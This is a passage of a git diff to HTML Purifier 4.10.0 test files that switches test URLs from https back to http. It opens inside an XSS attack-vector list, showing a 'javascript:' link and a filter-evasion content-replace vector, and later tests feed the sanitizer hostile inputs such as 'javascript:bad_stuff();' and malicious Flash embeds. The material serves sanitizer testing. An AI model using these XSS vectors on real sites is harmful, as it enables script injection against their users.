class="s">O8.54</span>]</browser> @@ -1287,8 +1287,8 @@ When combined with the above URL, removing "www." will save an additio </attack> <attack> <name>JavaScript Link Location</name> - <code><A HREF="javascript:document.location='https://www.google.com/'">XSS</A></code> - <desc>URL string evasion (assuming "https://www.google.com/" is programmatically disallowed) + <code><A HREF="javascript:document.location='http://www.google.com/'">XSS</A></code> + <desc>URL string evasion (assuming "http://www.google.com/" is programmatically disallowed) JavaScript link location</desc> <label>URL Obfuscation</label> @@ -1297,8 +1297,8 @@ JavaScript link location</desc> </attack> <attack> <name>Content Replace</name> - <code><A HREF="https://www.gohttps://www.google.com/ogle.com/">XSS</A></code> - <desc>Content replace as an attack vector (assuming "https://www.google.com/" is programmatically replaced with null). I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself (like https://quickwired.com/kallahar/smallprojects/php_xss_filter_function.php) to help create the attack vector ("java&#x26;#x09;script:" was converted into "java&#x09;script:".</desc> + <code><A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A></code> + <desc>Content replace as an attack vector (assuming "http://www.google.com/" is programmatically replaced with null). I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself (like http://quickwired.com/kallahar/smallprojects/php_xss_filter_function.php) to help create the attack vector ("java&#x26;#x09;script:" was converted into "java&#x09;script:".</desc> <label>URL Obfuscation</label> <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/AttrDef/CSS/URITest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/AttrDef/CSS/URITest.php index a559c4c..6a75319 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/AttrDef/CSS/URITest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/AttrDef/CSS/URITest.php @@ -10,18 +10,18 @@ class HTMLPurifier_AttrDef_CSS_URITest extends HTMLPurifier_AttrDefHarness $this->assertDef('', false); // we could be nice but we won't be - $this->assertDef('https://www.example.com/', false); + $this->assertDef('http://www.example.com/', false); $this->assertDef('url(', false); $this->assertDef('url("")', true); - $result = 'url("https://www.example.com/")'; - $this->assertDef('url(https://www.example.com/)', $result); - $this->assertDef('url("https://www.example.com/")', $result); - $this->assertDef("url('https://www.example.com/')", $result); + $result = 'url("http://www.example.com/")'; + $this->assertDef('url(http://www.example.com/)', $result); + $this->assertDef('url("http://www.example.com/")', $result); + $this->assertDef("url('http://www.example.com/')", $result); $this->assertDef( - ' url( "https://www.example.com/" ) ', $result); - $this->assertDef("url(https://www.example.com/foo,bar\)\'\()", - 'url("https://www.example.com/foo,bar%29%27%28")'); + ' url( "http://www.example.com/" ) ', $result); + $this->assertDef("url(http://www.example.com/foo,bar\)\'\()", + 'url("http://www.example.com/foo,bar%29%27%28")'); } } diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/AttrDef/URI/HostTest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/AttrDef/URI/HostTest.php index 84d56ba..c047a69 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/AttrDef/URI/HostTest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/AttrDef/URI/HostTest.php @@ -20,7 +20,7 @@ class HTMLPurifier_AttrDef_URI_HostTest extends HTMLPurifier_AttrDefHarness $this->assertDef('.test', false); $this->assertDef('ff'); $this->assertDef('1f'); // per RFC 1123 - // See also https://serverfault.com/questions/638260/is-it-valid-for-a-hostname-to-start-with-a-digit + // See also http://serverfault.com/questions/638260/is-it-valid-for-a-hostname-to-start-with-a-digit $this->assertDef('-f', false); $this->assertDef('f1'); $this->assertDef('f-', false); diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/AttrDef/URITest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/AttrDef/URITest.php index ac34e24..5171f6a 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/AttrDef/URITest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/AttrDef/URITest.php @@ -14,9 +14,9 @@ class HTMLPurifier_AttrDef_URITest extends HTMLPurifier_AttrDefHarness public function testIntegration() { - $this->assertDef('https://www.google.com/'); - $this->assertDef('https:', ''); - $this->assertDef('https:/foo', '/foo'); + $this->assertDef('http://www.google.com/'); + $this->assertDef('http:', ''); + $this->assertDef('http:/foo', '/foo'); $this->assertDef('javascript:bad_stuff();', false); $this->assertDef('ftp://www.example.com/'); $this->assertDef('news:rec.alt'); @@ -28,15 +28,15 @@ class HTMLPurifier_AttrDef_URITest extends HTMLPurifier_AttrDefHarness public function testIntegrationWithPercentEncoder() { $this->assertDef( - 'https://www.example.com/%56%fc%GJ%5%FC', - 'https://www.example.com/V%FC%25GJ%255%FC' + 'http://www.example.com/%56%fc%GJ%5%FC', + 'http://www.example.com/V%FC%25GJ%255%FC' ); } public function testPercentEncoding() { $this->assertDef( - 'https:colon:mercenary', + 'http:colon:mercenary', 'colon%3Amercenary' ); } @@ -44,23 +44,23 @@ class HTMLPurifier_AttrDef_URITest extends HTMLPurifier_AttrDefHarness public function testPercentEncodingPreserve() { $this->assertDef( - 'https://www.example.com/abcABC123-_.!~*()\'' + 'http://www.example.com/abcABC123-_.!~*()\'' ); } public function testEmbeds() { $this->def = new HTMLPurifier_AttrDef_URI(true); - $this->assertDef('https://sub.example.com/alas?foo=asd'); + $this->assertDef('http://sub.example.com/alas?foo=asd'); $this->assertDef('mailto:foo@example.com', false); } public function testConfigMunge() { - $this->config->set('URI.Munge', 'https://www.google.com/url?q=%s'); + $this->config->set('URI.Munge', 'http://www.google.com/url?q=%s'); $this->assertDef( - 'https://www.example.com/', - 'https://www.google.com/url?q=http%3A%2F%2Fwww.example.com%2F' + 'http://www.example.com/', + 'http://www.google.com/url?q=http%3A%2F%2Fwww.example.com%2F' ); $this->assertDef('index.html'); $this->assertDef('javascript:foobar();', false); @@ -68,17 +68,17 @@ class HTMLPurifier_AttrDef_URITest extends HTMLPurifier_AttrDefHarness public function testDefaultSchemeRemovedInBlank() { - $this->assertDef('https:', ''); + $this->assertDef('http:', ''); } public function testDefaultSchemeRemovedInRelativeURI() { - $this->assertDef('https:/foo/bar', '/foo/bar'); + $this->assertDef('http:/foo/bar', '/foo/bar'); } public function testDefaultSchemeNotRemovedInAbsoluteURI() { - $this->assertDef('https://example.com/foo/bar'); + $this->assertDef('http://example.com/foo/bar'); } public function testDefaultSchemeNull() @@ -106,7 +106,7 @@ class HTMLPurifier_AttrDef_URITest extends HTMLPurifier_AttrDefHarness public function testURIDefinitionValidation() { $parser = new HTMLPurifier_URIParser(); - $uri = $parser->parse('https://example.com'); + $uri = $parser->parse('http://example.com'); $this->config->set('URI.DefinitionID', 'HTMLPurifier_AttrDef_URITest->testURIDefinitionValidation'); generate_mock_once('HTMLPurifier_URIDefinition'); @@ -132,7 +132,7 @@ class HTMLPurifier_AttrDef_URITest extends HTMLPurifier_AttrDefHarness HTMLPurifier_DefinitionCacheFactory::instance($factory_mock); $factory_mock->returns('create', $cache_mock); - $this->assertDef('https://example.com'); + $this->assertDef('http://example.com'); HTMLPurifier_DefinitionCacheFactory::instance($old); } @@ -155,10 +155,10 @@ class HTMLPurifier_AttrDef_URITest extends HTMLPurifier_AttrDefHarness $this->config->set('URI.HostPolicy', 'DenyAll'); $this->config->set('URI.HostWhitelist', array(null, 'google.com')); - $this->assertDef('https://example.com/fo/google.com', false); + $this->assertDef('http://example.com/fo/google.com', false); $this->assertDef('server.txt'); $this->assertDef('ftp://www.google.com/?t=a'); - $this->assertDef('https://google.com.tricky.spamsite.net', false); + $this->assertDef('http://google.com.tricky.spamsite.net', false); } */ diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/ErrorCollectorTest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/ErrorCollectorTest.php index f9c3701..ed52506 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/ErrorCollectorTest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/ErrorCollectorTest.php @@ -97,7 +97,7 @@ class HTMLPurifier_ErrorCollectorTest extends HTMLPurifier_Harness $this->context->register('CurrentToken', $current_token); // 0 - $current_token = new HTMLPurifier_Token_Start('a', array('href' => 'https://example.com'), 32); + $current_token = new HTMLPurifier_Token_Start('a', array('href' => 'http://example.com'), 32); $this->language->returns('formatMessage', 'Token message', array('message-data-token', array('CurrentToken' => $current_token))); $this->collector->send(E_NOTICE, 'message-data-token'); @@ -116,7 +116,7 @@ class HTMLPurifier_ErrorCollectorTest extends HTMLPurifier_Harness $result = array( 0 => array(32, E_NOTICE, 'Token message', array()), 1 => array(32, E_NOTICE, '$CurrentAttr.Name => $CurrentAttr.Value', array()), - 2 => array(32, E_NOTICE, 'href => https://example.com', array()) + 2 => array(32, E_NOTICE, 'href => http://example.com', array()) ); $this->assertIdentical($this->collector->getRaw(), $result); diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/Filter/ExtractStyleBlocksTest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/Filter/ExtractStyleBlocksTest.php index 0efd531..1799da5 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/Filter/ExtractStyleBlocksTest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/Filter/ExtractStyleBlocksTest.php @@ -253,7 +253,7 @@ text-align:center public function test_cleanCSS_caseSensitive() { - $this->assertCleanCSS("a .foo #ID div.cl#foo {\nbackground:url(\"https://foo/BAR\")\n}"); + $this->assertCleanCSS("a .foo #ID div.cl#foo {\nbackground:url(\"http://foo/BAR\")\n}"); } public function test_extractStyleBlocks_backtracking() diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/FormsTest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/FormsTest.php index 3ac5671..6339b21 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/FormsTest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/FormsTest.php @@ -15,7 +15,7 @@ class HTMLPurifier_HTMLModule_FormsTest extends HTMLPurifier_HTMLModuleHarness $this->config->set('HTML.Doctype', 'HTML 4.01 Strict'); $this->assertResult( // need support for label for later ' -<form action="https://somesite.com/prog/adduser" method="post"> +<form action="http://somesite.com/prog/adduser" method="post"> <p> <label>First name: </label> <input type="text" id="firstname" /><br /> @@ -35,7 +35,7 @@ class HTMLPurifier_HTMLModule_FormsTest extends HTMLPurifier_HTMLModuleHarness { $this->config->set('HTML.Doctype', 'HTML 4.01 Strict'); $this->assertResult(' -<form action="https://somesite.com/prog/component-select" method="post"> +<form action="http://somesite.com/prog/component-select" method="post"> <p> <select multiple="multiple" size="4" name="component-select"> <option selected="selected" value="Component_1_a">Component_1</option> @@ -56,7 +56,7 @@ class HTMLPurifier_HTMLModule_FormsTest extends HTMLPurifier_HTMLModuleHarness { $this->config->set('HTML.Doctype', 'HTML 4.01 Strict'); $this->assertResult(' -<form action="https://somesite.com/prog/someprog" method="post"> +<form action="http://somesite.com/prog/someprog" method="post"> <p> <select name="ComOS"> <option selected="selected" label="none" value="none">None</option> @@ -83,7 +83,7 @@ class HTMLPurifier_HTMLModule_FormsTest extends HTMLPurifier_HTMLModuleHarness { $this->config->set('HTML.Doctype', 'HTML 4.01 Strict'); $this->assertResult(' -<form action="https://somesite.com/prog/text-read" method="post"> +<form action="http://somesite.com/prog/text-read" method="post"> <p> <textarea name="thetext" rows="20" cols="80"> First line of initial text. diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/NofollowTest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/NofollowTest.php index b7407f4..6f705d6 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/NofollowTest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/NofollowTest.php @@ -13,15 +13,15 @@ class HTMLPurifier_HTMLModule_NofollowTest extends HTMLPurifier_HTMLModuleHarnes public function testNofollow() { $this->assertResult( - '<a href="https://google.com">x</a><a href="https://google.com" rel="blah">a</a><a href="/local">b</a><a href="mailto:foo@example.com">c</a>', - '<a href="https://google.com" rel="nofollow">x</a><a href="https://google.com" rel="blah nofollow">a</a><a href="/local">b</a><a href="mailto:foo@example.com">c</a>' + '<a href="http://google.com">x</a><a href="http://google.com" rel="blah">a</a><a href="/local">b</a><a href="mailto:foo@example.com">c</a>', + '<a href="http://google.com" rel="nofollow">x</a><a href="http://google.com" rel="blah nofollow">a</a><a href="/local">b</a><a href="mailto:foo@example.com">c</a>' ); } public function testNofollowDupe() { $this->assertResult( - '<a href="https://google.com" rel="nofollow">x</a><a href="https://google.com" rel="blah nofollow">a</a><a href="/local">b</a><a href="mailto:foo@example.com">c</a>' + '<a href="http://google.com" rel="nofollow">x</a><a href="http://google.com" rel="blah nofollow">a</a><a href="/local">b</a><a href="mailto:foo@example.com">c</a>' ); } diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/ObjectTest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/ObjectTest.php index 268502a..ba3321c 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/ObjectTest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/ObjectTest.php @@ -25,12 +25,12 @@ class HTMLPurifier_HTMLModule_ObjectTest extends HTMLPurifier_HTMLModuleHarness public function testStandardUseCase() { $this->assertResult( -'<object type="video/x-ms-wmv" data="https://domain.com/video.wmv" width="320" height="256"> -<param name="src" value="https://domain.com/video.wmv" /> +'<object type="video/x-ms-wmv" data="http://domain.com/video.wmv" width="320" height="256"> +<param name="src" value="http://domain.com/video.wmv" /> <param name="autostart" value="false" /> <param name="controller" value="true" /> -<param name="pluginurl" value="https://www.microsoft.com/Windows/MediaPlayer/" /> -<a href="https://www.microsoft.com/Windows/MediaPlayer/">Windows Media player required</a> +<param name="pluginurl" value="http://www.microsoft.com/Windows/MediaPlayer/" /> +<a href="http://www.microsoft.com/Windows/MediaPlayer/">Windows Media player required</a> </object>' ); } diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/SafeEmbedTest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/SafeEmbedTest.php index 815bb42..2dc7a4f 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/SafeEmbedTest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/SafeEmbedTest.php @@ -13,31 +13,31 @@ class HTMLPurifier_HTMLModule_SafeEmbedTest extends HTMLPurifier_HTMLModuleHarne public function testMinimal() { $this->assertResult( - '<embed src="https://www.youtube.com/v/RVtEQxH7PWA&hl=en" />', - '<embed src="https://www.youtube.com/v/RVtEQxH7PWA&hl=en" allowscriptaccess="never" allownetworking="internal" type="application/x-shockwave-flash" />' + '<embed src="http://www.youtube.com/v/RVtEQxH7PWA&hl=en" />', + '<embed src="http://www.youtube.com/v/RVtEQxH7PWA&hl=en" allowscriptaccess="never" allownetworking="internal" type="application/x-shockwave-flash" />' ); } public function testYouTube() { $this->assertResult( - '<embed src="https://www.youtube.com/v/RVtEQxH7PWA&hl=en" type="application/x-shockwave-flash" width="425" height="344"></embed>', - '<embed src="https://www.youtube.com/v/RVtEQxH7PWA&hl=en" type="application/x-shockwave-flash" width="425" height="344" allowscriptaccess="never" allownetworking="internal" />' + '<embed src="http://www.youtube.com/v/RVtEQxH7PWA&hl=en" type="application/x-shockwave-flash" width="425" height="344"></embed>', + '<embed src="http://www.youtube.com/v/RVtEQxH7PWA&hl=en" type="application/x-shockwave-flash" width="425" height="344" allowscriptaccess="never" allownetworking="internal" />' ); } public function testMalicious() { $this->assertResult( - '<embed src="https://example.com/bad.swf" type="application/x-shockwave-flash" width="9999999" height="3499994" allowscriptaccess="always" allownetworking="always" />', - '<embed src="https://example.com/bad.swf" type="application/x-shockwave-flash" width="1200" height="1200" allowscriptaccess="never" allownetworking="internal" />' + '<embed src="http://example.com/bad.swf" type="application/x-shockwave-flash" width="9999999" height="3499994" allowscriptaccess="always" allownetworking="always" />', + '<embed src="http://example.com/bad.swf" type="application/x-shockwave-flash" width="1200" height="1200" allowscriptaccess="never" allownetworking="internal" />' ); } public function testFull() { $this->assertResult( - '<b><embed src="https://www.youtube.com/v/RVtEQxH7PWA&hl=en" type="application/x-shockwave-flash" width="24" height="23" allowscriptaccess="never" allownetworking="internal" wmode="window" /></b>' + '<b><embed src="http://www.youtube.com/v/RVtEQxH7PWA&hl=en" type="application/x-shockwave-flash" width="24" height="23" allowscriptaccess="never" allownetworking="internal" wmode="window" /></b>' ); } diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/SafeObjectTest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/SafeObjectTest.php index 91900e6..4cda739 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/SafeObjectTest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/SafeObjectTest.php @@ -22,23 +22,23 @@ class HTMLPurifier_HTMLModule_SafeObjectTest extends HTMLPurifier_HTMLModuleHarn { // embed is purposely removed $this->assertResult( - '<object width="425" height="344"><param name="movie" value="https://www.youtube.com/v/RVtEQxH7PWA&hl=en"></param><embed src="https://www.youtube.com/v/RVtEQxH7PWA&hl=en" type="application/x-shockwave-flash" width="425" height="344"></embed></object>', - '<object width="425" height="344" data="https://www.youtube.com/v/RVtEQxH7PWA&hl=en" type="application/x-shockwave-flash"><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /><param name="movie" value="https://www.youtube.com/v/RVtEQxH7PWA&hl=en" /></object>' + '<object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/RVtEQxH7PWA&hl=en"></param><embed src="http://www.youtube.com/v/RVtEQxH7PWA&hl=en" type="application/x-shockwave-flash" width="425" height="344"></embed></object>', + '<object width="425" height="344" data="http://www.youtube.com/v/RVtEQxH7PWA&hl=en" type="application/x-shockwave-flash"><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /><param name="movie" value="http://www.youtube.com/v/RVtEQxH7PWA&hl=en" /></object>' ); } public function testMalicious() { $this->assertResult( - '<object width="9999999" height="9999999"><param name="allowScriptAccess" value="always" /><param name="movie" value="https://example.com/attack.swf" /></object>', - '<object width="1200" height="1200" data="https://example.com/attack.swf" type="application/x-shockwave-flash"><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /><param name="movie" value="https://example.com/attack.swf" /></object>' + '<object width="9999999" height="9999999"><param name="allowScriptAccess" value="always" /><param name="movie" value="http://example.com/attack.swf" /></object>', + '<object width="1200" height="1200" data="http://example.com/attack.swf" type="application/x-shockwave-flash"><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /><param name="movie" value="http://example.com/attack.swf" /></object>' ); } public function testFull() { $this->assertResult( - '<b><object width="425" height="344" type="application/x-shockwave-flash" data="Foobar"><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /><param name="flashvars" value="foobarbaz=bally" /><param name="movie" value="https://www.youtube.com/v/RVtEQxH7PWA&hl=en" /><param name="wmode" value="window" /></object></b>' + '<b><object width="425" height="344" type="application/x-shockwave-flash" data="Foobar"><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /><param name="flashvars" value="foobarbaz=bally" /><param name="movie" value="http://www.youtube.com/v/RVtEQxH7PWA&hl=en" /><param name="wmode" value="window" /></object></b>' ); } @@ -46,7 +46,7 @@ class HTMLPurifier_HTMLModule_SafeObjectTest extends HTMLPurifier_HTMLModuleHarn { $this->config->set('HTML.FlashAllowFullScreen', true); $this->assertResult( - '<b><object width="425" height="344" type="application/x-shockwave-flash" data="Foobar"><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /><param name="flashvars" value="foobarbaz=bally" /><param name="movie" value="https://www.youtube.com/v/RVtEQxH7PWA&hl=en" /><param name="wmode" value="window" /><param name="allowFullScreen" value="true" /></object></b>' + '<b><object width="425" height="344" type="application/x-shockwave-flash" data="Foobar"><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /><param name="flashvars" value="foobarbaz=bally" /><param name="movie" value="http://www.youtube.com/v/RVtEQxH7PWA&hl=en" /><param name="wmode" value="window" /><param name="allowFullScreen" value="true" /></object></b>' ); } diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/SafeScriptingTest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/SafeScriptingTest.php index 8316472..e8fc9e9 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/SafeScriptingTest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/SafeScriptingTest.php @@ -6,7 +6,7 @@ class HTMLPurifier_HTMLModule_SafeScriptingTest extends HTMLPurifier_HTMLModuleH public function setUp() { parent::setUp(); - $this->config->set('HTML.SafeScripting', array('https://localhost/foo.js')); + $this->config->set('HTML.SafeScripting', array('http://localhost/foo.js')); } public function testMinimal() @@ -20,14 +20,14 @@ class HTMLPurifier_HTMLModule_SafeScriptingTest extends HTMLPurifier_HTMLModuleH public function testGood() { $this->assertResult( - '<script type="text/javascript" src="https://localhost/foo.js" />' + '<script type="text/javascript" src="http://localhost/foo.js" />' ); } public function testBad() { $this->assertResult( - '<script type="text/javascript" src="https://localhost/foobar.js" />', + '<script type="text/javascript" src="http://localhost/foobar.js" />', '' ); } diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/TargetBlankTest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/TargetBlankTest.php index 018eb8b..bd82dd1 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/TargetBlankTest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/TargetBlankTest.php @@ -12,15 +12,15 @@ class HTMLPurifier_HTMLModule_TargetBlankTest extends HTMLPurifier_HTMLModuleHar public function testTargetBlank() { $this->assertResult( - '<a href="https://google.com">a</a><a href="/local">b</a><a href="mailto:foo@example.com">c</a>', - '<a href="https://google.com" target="_blank" rel="noreferrer noopener">a</a><a href="/local">b</a><a href="mailto:foo@example.com">c</a>' + '<a href="http://google.com">a</a><a href="/local">b</a><a href="mailto:foo@example.com">c</a>', + '<a href="http://google.com" target="_blank" rel="noreferrer noopener">a</a><a href="/local">b</a><a href="mailto:foo@example.com">c</a>' ); } public function testTargetBlankNoDupe() { $this->assertResult( - '<a href="https://google.com" target="_blank">a</a>', - '<a href="https://google.com" target="_blank" rel="noreferrer noopener">a</a>' + '<a href="http://google.com" target="_blank">a</a>', + '<a href="http://google.com" target="_blank" rel="noreferrer noopener">a</a>' ); } diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/TargetNoopenerTest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/TargetNoopenerTest.php index 8ed9081..1543320 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/TargetNoopenerTest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/TargetNoopenerTest.php @@ -14,8 +14,8 @@ class HTMLPurifier_HTMLModule_TargetNoopenerTest extends HTMLPurifier_HTMLModule public function testNoreferrer() { $this->assertResult( - '<a href="https://google.com" target="_blank">x</a>', - '<a href="https://google.com" target="_blank" rel="noopener">x</a>' + '<a href="http://google.com" target="_blank">x</a>', + '<a href="http://google.com" target="_blank" rel="noopener">x</a>' ); } @@ -23,8 +23,8 @@ class HTMLPurifier_HTMLModule_TargetNoopenerTest extends HTMLPurifier_HTMLModule { $this->config->set('Attr.AllowedRel', 'noopener'); $this->assertResult( - '<a href="https://google.com" target="_blank" rel="noopener">x</a>', - '<a href="https://google.com" target="_blank" rel="noopener">x</a>' + '<a href="http://google.com" target="_blank" rel="noopener">x</a>', + '<a href="http://google.com" target="_blank" rel="noopener">x</a>' ); } @@ -32,16 +32,16 @@ class HTMLPurifier_HTMLModule_TargetNoopenerTest extends HTMLPurifier_HTMLModule { $this->config->set('HTML.TargetBlank', true); $this->assertResult( - '<a href="https://google.com">x</a>', - '<a href="https://google.com" target="_blank" rel="noopener">x</a>' + '<a href="http://google.com">x</a>', + '<a href="http://google.com" target="_blank" rel="noopener">x</a>' ); } public function testNoTarget() { $this->assertResult( - '<a href="https://google.com">x</a>', - '<a href="https://google.com">x</a>' + '<a href="http://google.com">x</a>', + '<a href="http://google.com">x</a>' ); } diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/TargetNoreferrerTest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/TargetNoreferrerTest.php index b4c1639..1a49a79 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/TargetNoreferrerTest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLModule/TargetNoreferrerTest.php @@ -14,8 +14,8 @@ class HTMLPurifier_HTMLModule_TargetNoreferrerTest extends HTMLPurifier_HTMLModu public function testNoreferrer() { $this->assertResult( - '<a href="https://google.com" target="_blank">x</a>', - '<a href="https://google.com" target="_blank" rel="noreferrer">x</a>' + '<a href="http://google.com" target="_blank">x</a>', + '<a href="http://google.com" target="_blank" rel="noreferrer">x</a>' ); } @@ -23,8 +23,8 @@ class HTMLPurifier_HTMLModule_TargetNoreferrerTest extends HTMLPurifier_HTMLModu { $this->config->set('Attr.AllowedRel', 'noreferrer'); $this->assertResult( - '<a href="https://google.com" target="_blank" rel="noreferrer">x</a>', - '<a href="https://google.com" target="_blank" rel="noreferrer">x</a>' + '<a href="http://google.com" target="_blank" rel="noreferrer">x</a>', + '<a href="http://google.com" target="_blank" rel="noreferrer">x</a>' ); } @@ -32,16 +32,16 @@ class HTMLPurifier_HTMLModule_TargetNoreferrerTest extends HTMLPurifier_HTMLModu { $this->config->set('HTML.TargetBlank', true); $this->assertResult( - '<a href="https://google.com">x</a>', - '<a href="https://google.com" target="_blank" rel="noreferrer">x</a>' + '<a href="http://google.com">x</a>', + '<a href="http://google.com" target="_blank" rel="noreferrer">x</a>' ); } public function testNoTarget() { $this->assertResult( - '<a href="https://google.com">x</a>', - '<a href="https://google.com">x</a>' + '<a href="http://google.com">x</a>', + '<a href="http://google.com">x</a>' ); } diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/allowed-preserve.htmlt b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/allowed-preserve.htmlt index a98aa56..7a57339 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/allowed-preserve.htmlt +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/allowed-preserve.htmlt @@ -3,6 +3,6 @@ HTML.AllowedElements = b,i,p,a HTML.AllowedAttributes = a.href,*.id --HTML-- <p>Par.</p> -<p>Para<a href="https://google.com/">gr</a>aph</p> +<p>Para<a href="http://google.com/">gr</a>aph</p> Text<b>Bol<i>d</i></b> --# vim: et sw=4 sts=4 diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/double-youtube.htmlt b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/double-youtube.htmlt index ad9338c..2467316 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/double-youtube.htmlt +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/double-youtube.htmlt @@ -2,5 +2,5 @@ HTML.SafeObject = true Output.FlashCompat = true --HTML-- -<object width="425" height="350" data="https://www.youtube.com/v/BdU--T8rLns" type="application/x-shockwave-flash"><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /><param name="movie" value="https://www.youtube.com/v/BdU--T8rLns" /><param name="wmode" value="window" /></object> +<object width="425" height="350" data="http://www.youtube.com/v/BdU--T8rLns" type="application/x-shockwave-flash"><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /><param name="movie" value="http://www.youtube.com/v/BdU--T8rLns" /><param name="wmode" value="window" /></object> --# vim: et sw=4 sts=4 diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/munge-extra.htmlt b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/munge-extra.htmlt index aaacb2d..f08f3ff 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/munge-extra.htmlt +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/munge-extra.htmlt @@ -5,8 +5,8 @@ URI.Munge = "/redirect?s=%s&t=%t&r=%r&n=%n&m=%m&p=%p" URI.MungeSecretKey = "foo" URI.MungeResources = true --HTML-- -<a href="https://example.com">Link</a> -<img src="https://example.com" style="background-image:url(https://example.com);" alt="example.com" /> +<a href="http://example.com">Link</a> +<img src="http://example.com" style="background-image:url(http://example.com);" alt="example.com" /> --EXPECT-- <a href="/redirect?s=http%3A%2F%2Fexample.com&t=c763c4a30204eee8470a3292e0f0cd91a639654d039d45f1495a50207847e954&r=&n=a&m=href&p=">Link</a> <img src="/redirect?s=http%3A%2F%2Fexample.com&t=c763c4a30204eee8470a3292e0f0cd91a639654d039d45f1495a50207847e954&r=1&n=img&m=src&p=" style="background-image:url("/redirect?s=http%3A%2F%2Fexample.com&t=c763c4a30204eee8470a3292e0f0cd91a639654d039d45f1495a50207847e954&r=1&n=img&m=style&p=background-image");" alt="example.com" /> diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/HTMLT/munge.htmlt 